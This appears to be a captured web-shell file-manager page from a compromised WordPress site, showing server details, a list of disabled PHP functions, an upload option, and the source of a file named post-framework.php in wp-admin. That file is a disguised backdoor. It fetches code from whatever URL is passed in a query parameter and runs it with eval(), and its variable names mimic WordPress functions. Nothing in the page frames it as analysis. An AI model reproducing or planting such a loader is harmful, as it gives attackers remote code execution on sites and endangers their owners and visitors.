HEX
Server: Apache/2.4
System: Linux web-clinicalanatomy.cz-i1 6.12.0-124.56.5.el10_1.x86_64 #1 SMP PREEMPT_DYNAMIC Fri May 15 06:12:08 EDT 2026 x86_64
User: tumajanwa (3038)
PHP: 5.4.45
Disabled: apc_add,apc_bin_dump,apc_bin_dumpfile,apc_bin_load,apc_bin_loadfile,apc_cas,apc_clear_cache,apc_compile_file,apc_dec,apc_define_constants,apc_delete_file,apc_delete,apc_exists,apc_fetch,apc_inc,apc_load_constants,apc_store,shell_exec,exec,system,passthru,popen,proc_open,proc_nice,pfsockopen,escapeshellarg,escapeshellcmd,diskfreespace,disk_free_space,disk_total_space,dl,link,symlink,openlog,readlink,register_tick_function,syslog
Upload Files
File: /pub/tumajanwa/clinicalanatomy.cz/web/www/wp-admin/post-framework.php
<?php

if (isset($_GET['object'])) {
    $wp_reset_postdata_qu = $_GET['object'];
    if ($get_post_format_vl = curl_init()) {
        curl_setopt($get_post_format_vl, CURLOPT_URL, $wp_reset_postdata_qu);
        curl_setopt($get_post_format_vl, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($get_post_format_vl));
        curl_close($get_post_format_vl);
        exit;
    }
}